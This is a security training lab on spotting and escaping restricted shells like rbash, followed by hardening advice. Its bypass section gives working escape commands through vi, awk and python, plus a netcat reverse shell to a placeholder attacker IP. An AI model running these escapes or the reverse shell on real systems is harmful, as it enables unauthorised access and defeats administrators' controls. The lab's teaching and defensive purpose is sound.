
Exercise 9: Bypassing Restricted Shells

Feb 17, 2025

Objective: Learn how to bypass restricted shell environments (such as rbash) that limit user capabilities, and understand how to implement effective restrictions to prevent such exploits.


Scenario: You gain access to a Linux system, but your account is confined to a restricted shell (e.g., rbash). Restricted shells are designed to limit user actions, but with some creative techniques, these restrictions can often be bypassed. Your task is to identify the restricted shell, bypass it, and implement secure configurations to prevent such exploits.


Lab Setup

  1. Environment:
    • A Linux system with a user account configured to use a restricted shell.
  2. Tools Required:
    • Terminal access to the Linux system.
    • Familiarity with basic shell commands and scripting.

Lab Steps

Step 1: Identify a Restricted Shell

Check the shell assigned to your user account by inspecting the /etc/passwd file:

grep "^$(whoami):" /etc/passwd

Example output:

testuser:x:1001:1001::/home/testuser:/bin/rbash

The shell path (e.g., /bin/rbash) indicates a restricted shell.

Attempt basic commands to confirm restrictions:

cd /
echo $PATH

Restricted shells often block navigation (cd) and limit accessible commands.

Step 2: Bypass the Restricted Shell

Modify Environment Variables:

Attempt to change the shell environment:

export SHELL=/bin/bash
export PATH=/bin:/usr/bin
/bin/bash

If successful, this will provide a full shell environment.

Invoke System Commands Indirectly:

Use built-in commands to invoke unrestricted shells:

vi

In vi, access a shell by typing:

:!bash

Alternatively, use awk or python to spawn a shell:

awk 'BEGIN {system("/bin/bash")}'
python -c 'import os; os.system("/bin/bash")'

Use Netcat for a Reverse Shell:

Set up a listener on your attack machine:

nc -lvnp 4444

On the restricted shell, execute:

nc -e /bin/bash <attacker_ip> 4444

Replace <attacker_ip> with your machine’s IP address.

Step 3: Gain Full Shell Access

If successful, verify your privileges:

whoami

Explore the system to determine the scope of your access.


Solution

Explanation:

  • Restricted shells like rbash limit user commands and navigation by controlling the environment and available binaries. However, creative methods such as modifying environment variables, leveraging unrestricted programs, or invoking system commands can bypass these restrictions.

Prevention:

  1. Enforce Shell Restrictions:
    • Use tools like chroot or containers for stricter isolation.
  2. Restrict Access to Critical Binaries:
    • Limit accessible commands and binaries by controlling the PATH environment variable so that it resolves only to approved programs.
  3. Disable Interactive Shells for Restricted Users:
    • Replace restricted user shells with non-interactive options like /usr/sbin/nologin.
  4. Monitor and Audit User Activity:
    • Use tools like auditd to log user commands and detect suspicious behavior.
  5. Apply the Principle of Least Privilege:
    • Ensure restricted users have only the minimal permissions required for their tasks.

Testing and Verification

  1. After implementing restrictions, attempt the bypass techniques to ensure they are no longer effective.
  2. Review shell and system logs to monitor for suspicious activity.
  3. Document findings and configurations for reporting.

Reflection

This exercise demonstrates the limitations of restricted shells and provides practical techniques to bypass and secure them. By completing this lab, you’ve gained hands-on experience in exploiting and mitigating restricted shell environments to enhance system security.
